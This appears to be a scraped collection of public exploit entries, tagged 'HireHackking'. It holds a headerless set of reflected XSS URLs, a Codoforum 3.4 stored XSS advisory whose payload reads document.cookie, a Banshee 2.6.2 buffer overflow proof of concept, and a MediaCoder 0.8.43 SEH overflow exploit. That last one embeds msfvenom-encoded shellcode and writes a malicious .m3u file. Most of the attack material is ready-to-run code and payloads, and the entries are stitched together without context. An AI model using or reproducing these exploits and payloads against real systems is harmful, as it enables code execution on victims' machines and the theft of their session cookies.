GET /api/goatgates

OR

/#/firewall
/#/system
/#/ipsec
/#/provisioning


XSS:

http://127.0.0.2/api/replacementui<script>alert(1)</script>
http://127.0.0.2/api/goatgates<script>alert(2)</script>
http://127.0.0.2/api/Blah-Blah<script>alert(3)</script>
http://127.0.0.2/api/<script>alert(4)</script>
HireHackking 
# Exploit Title: Codoforum v3.4 Stored Cross-Site Scripting (Stored XSS)
# Google Dork: intext:"powered by codoforum"
# Date: 01/06/2016
# Exploit Author: Ahmed Sherif (OffensiveBits)
# Vendor Homepage: http://codologic.com/page/
# Software Link: http://codoforum.com/index.php
# Version: V3.4
# Tested on: Linux Mint


1. Description:

The Reply and search functionalities are both vulnerable to Stored XSS due
to improper filtration in displaying the content of replies.


2. Steps to reproduce the vulnerability:


1. Login to your account.
2. look for any topic and add a reply .
3. in the reply textbox add a widely used common keyword within xss
payload for example : (keyword"><svg/onload=prompt(document.cookie)>)
4. while any user surfing the topic and started to search for specific
keywords the javascript code will be executed.



3. Solution:

The new version of codoforum will be released this week.
HireHackking 
'''
Title:
====

Banshee 2.6.2 Local Buffer Overflow Vulnerability


Credit:
======
Name: Ilca Lucian
Contact: lucianfilca@gmail.com
lucian@pwnthecode.org


CVE:
=====

Unknown (for moment)


Product:
=======


Play your music and videos. Keep up with your podcasts and Internet radio.
Discover new music and podcasts. Keep your portable device loaded with good
stuff.

Simple enough to enjoy. Powerful enough to thrill. Open source through and
through.

Product link: http://www.banshee.fm


Abstract:
=======

Lucian I. discovered a Local Buffer Overflow vulnerability in Banshee
Player 2.6.2 .


Affected Version:
=============

Ver 2.6.2


Date:
============
19.06.2016


Exploitation-Technique:
===================

Local


Severity Rating:
===================

4.4


Details:
=======
Vulnerability Description : Banshee Media Player is vulnerable to buffer
overflow vulnerability.The software performs operations on a memory buffer,
but it can read from or write to a memory location that is outside of the
intended boundary of the buffer.Certain languages allow direct addressing
of memory locations and do not automatically ensure that these locations
are valid for the memory buffer that is being referenced. This can cause
read or write operations to be performed on memory locations that may be
associated with other variables, data structures, or internal program data.

Impact : Banshee 2.6.2 is prone to a local buffer-overflow vulnerability
because the application fails to perform adequate boundary checks on
user-supplied input. Specifically, this issue occurs when opening a '.mp3'
playlist file that contains excessive data.

Attackers may leverage this issue to execute remote buffer overflow or
inject arbitrary code in the context of the application. Failed attacks
will cause denial-of-service conditions.

Path Log:

type=PATH msg=audit(1466452858.351:14): item=0 name="/usr/bin/banshee"
inode=17568145 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00
nametype=NORMAL
type=PROCTITLE msg=audit(1466452858.351:14):
proctitle=64656275676673002F7573722F62696E2F62616E73686565
type=SYSCALL msg=audit(1466452858.351:15): arch=c000003e syscall=2
success=yes exit=3 a0=7fffd6ed664f a1=80000 a2=ffffffff a3=ca items=1
ppid=16021 pid=9458 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0
egid=0 sgid=0 fsgid=0 tty=pts0 ses=4294967295 comm="debugfs"
exe="/sbin/debugfs" key=(null)
type=CWD msg=audit(1466452858.351:15):  cwd="/root/Downloads"
type=PATH msg=audit(1466452858.351:15): item=0 name="/usr/bin/banshee"
inode=17568145 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00
nametype=NORMAL
type=PROCTITLE msg=audit(1466452858.351:15):
proctitle=64656275676673002F7573722F62696E2F62616E73686565
type=SYSCALL msg=audit(1466453064.143:16): arch=c000003e syscall=59
success=yes exit=0 a0=126cb9f4 a1=adb4f30 a2=12b5d0c0 a3=593 items=3 ppid=1
pid=9559 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0
tty=tty2 ses=1 comm="banshee" exe="/usr/bin/env" key=(null)
type=EXECVE msg=audit(1466453064.143:16): argc=5 a0="/usr/bin/env"
a1="bash" a2="/usr/bin/banshee" a3="--redirect-log" a4="--play-enqueued"
type=CWD msg=audit(1466453064.143:16):  cwd="/root"
type=PATH msg=audit(1466453064.143:16): item=0 name="/usr/bin/banshee"
inode=17568145 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00
nametype=NORMAL
type=PATH msg=audit(1466453064.143:16): item=1 name="/usr/bin/env"
inode=17567018 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00
nametype=NORMAL
type=PATH msg=audit(1466453064.143:16): item=2
name="/lib64/ld-linux-x86-64.so.2" inode=9047695 dev=08:01 mode=0100755
ouid=0 ogid=0 rdev=00:00 nametype=NORMAL
type=PROCTITLE msg=audit(1466453064.143:16):
proctitle=2F7573722F62696E2F656E760062617368002F7573722F62696E2F62616E73686565002D2D72656469726563742D6C6F67002D2D706C61792D656E717565756564
type=SYSCALL msg=audit(1466453064.159:17): arch=c000003e syscall=2
success=yes exit=3 a0=16b4268 a1=0 a2=0 a3=8 items=1 ppid=1 pid=9559 auid=0
uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=tty2 ses=1
comm="bash" exe="/bin/bash" key=(null)
type=CWD msg=audit(1466453064.159:17):  cwd="/root"



Error report image link :

https://postimg.org/image/x0x8raw2v/


Prerequisites:
======================

The attacker needs to entice victims to perform an action in order to
exploit this vulnerability.


Proof Of Concept:
================


POC Exploit code:
'''

#!/usr/bin/python

A = "\x41"

p0c = 'A' * 7550

generate = "dos.mp3"
file = open(generate , "w")
file.write(p0c)
file.close()


'''
Risk:
=====

The security risk of the Local Buffer Overflow Vulnerability is estimated
as moderate.


Credits:
=======

Lucian Ilca
'''
HireHackking 
#!/usr/bin/python

# Exploit Title: Mediacoder 0.8.43.5830 - Buffer Overflow SEH Exploit (.m3u)
# Date: 25-June-2016
# Exploit Author: Sibusiso Sishi 
# Email: sibusiso [at] IronSky [dot] co.za
# Vendor Homepage: http://www.mediacoderhq.com/
# Software Link: http://www.mediacoderhq.com/getfile.htm?site=mediatronic.com.au/download&file=MediaCoder-0.8.43.5830.exe
# Version: 0.8.43.5830
# Tested on: Windows XP SP3 EN



#msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00\x0a\x0d\xff' -f c
shellcode = ("\xda\xca\xbb\x4a\xfa\x8e\x16\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x31\x83\xc2\x04\x31\x5a\x14\x03\x5a\x5e\x18\x7b\xea\xb6\x5e"
"\x84\x13\x46\x3f\x0c\xf6\x77\x7f\x6a\x72\x27\x4f\xf8\xd6\xcb"
"\x24\xac\xc2\x58\x48\x79\xe4\xe9\xe7\x5f\xcb\xea\x54\xa3\x4a"
"\x68\xa7\xf0\xac\x51\x68\x05\xac\x96\x95\xe4\xfc\x4f\xd1\x5b"
"\x11\xe4\xaf\x67\x9a\xb6\x3e\xe0\x7f\x0e\x40\xc1\xd1\x05\x1b"
"\xc1\xd0\xca\x17\x48\xcb\x0f\x1d\x02\x60\xfb\xe9\x95\xa0\x32"
"\x11\x39\x8d\xfb\xe0\x43\xc9\x3b\x1b\x36\x23\x38\xa6\x41\xf0"
"\x43\x7c\xc7\xe3\xe3\xf7\x7f\xc8\x12\xdb\xe6\x9b\x18\x90\x6d"
"\xc3\x3c\x27\xa1\x7f\x38\xac\x44\x50\xc9\xf6\x62\x74\x92\xad"
"\x0b\x2d\x7e\x03\x33\x2d\x21\xfc\x91\x25\xcf\xe9\xab\x67\x85"
"\xec\x3e\x12\xeb\xef\x40\x1d\x5b\x98\x71\x96\x34\xdf\x8d\x7d"
"\x71\x2f\xc4\xdc\xd3\xb8\x81\xb4\x66\xa5\x31\x63\xa4\xd0\xb1"
"\x86\x54\x27\xa9\xe2\x51\x63\x6d\x1e\x2b\xfc\x18\x20\x98\xfd"
"\x08\x43\x7f\x6e\xd0\xaa\x1a\x16\x73\xb3")


seh = "\x94\x39\xf0\x64" #0x64f03994 pop ebx # pop esi # ret swscale-3.dll
nseh = "\xeb\x07\x90\x90" #JMP SHORT to nopsled which leads to the shellcode
nop_sled = "\x90" * 14

buff = "http:// " 
buff += "A" * 776
buff += nseh
buff += seh
buff += nop_sled
buff += shellcode
buff += "D" * (4216 - (len(shellcode + nop_sled)))
fo = open("foo.m3u", "wb")
fo.write (buff)
fo.close()